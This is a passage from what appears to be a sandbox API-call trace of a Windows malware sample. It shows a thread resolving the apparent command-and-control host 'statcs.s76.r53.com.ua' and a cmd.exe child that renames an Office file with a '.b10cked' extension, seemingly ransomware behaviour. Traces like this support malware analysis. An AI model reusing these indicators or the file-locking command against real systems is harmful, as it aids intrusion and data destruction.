Type=0x20000)) returned 0x1c [0175.375] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] ResetEvent (hEvent=0x88) returned 1 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] ResetEvent (hEvent=0x88) returned 1 [0175.375] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] CloseHandle (hObject=0x88) returned 1 [0175.376] CloseHandle (hObject=0x8c) returned 1 [0175.376] CloseHandle (hObject=0x84) returned 1 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.379] FreeLibrary (hLibModule=0x76910000) returned 1 [0175.379] LocalFree (hMem=0x2c4448) returned 0x0 [0175.379] FreeLibrary (hLibModule=0x76910000) returned 1 [0175.379] LocalFree (hMem=0x2c4438) returned 0x0 [0175.379] ExitProcess (uExitCode=0x0) Thread: id = 414 os_tid = 0xde8 [0175.057] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0175.057] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0175.057] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431ffc, cbMultiByte=27, lpWideCharStr=0x193ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0175.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0175.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0175.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0175.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0175.058] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x193fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x193fbac | out: ppResult=0x193fbac*=0x0) returned 11001 [0175.214] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x193fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x193fbac | out: ppResult=0x193fbac*=0x0) returned 11001 [0175.330] getnameinfo (in: pSockaddr=0x193fc14, SockaddrLength=0x0, pNodeBuffer=0x135bc7c, NodeBufferSize=0x401, pServiceBuffer=0x1415124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="s", pServiceBuffer="") returned 10047 [0175.330] htons (hostshort=0x0) returned 0x0 [0175.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0175.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] SetEvent (hEvent=0x84) returned 1 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] CloseHandle (hObject=0xb8) returned 1 [0175.330] RtlExitUserThread (Status=0x0) Thread: id = 415 os_tid = 0xe08 Process: id = "311" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xd7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24068 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24069 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24070 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24071 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 24072 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24073 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24074 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24075 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24076 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24077 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24148 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24149 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24150 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24151 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 24152 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 24153 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24154 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24155 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24156 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24157 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24158 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24159 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24160 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24161 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24162 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 24163 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24164 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24165 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24166 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 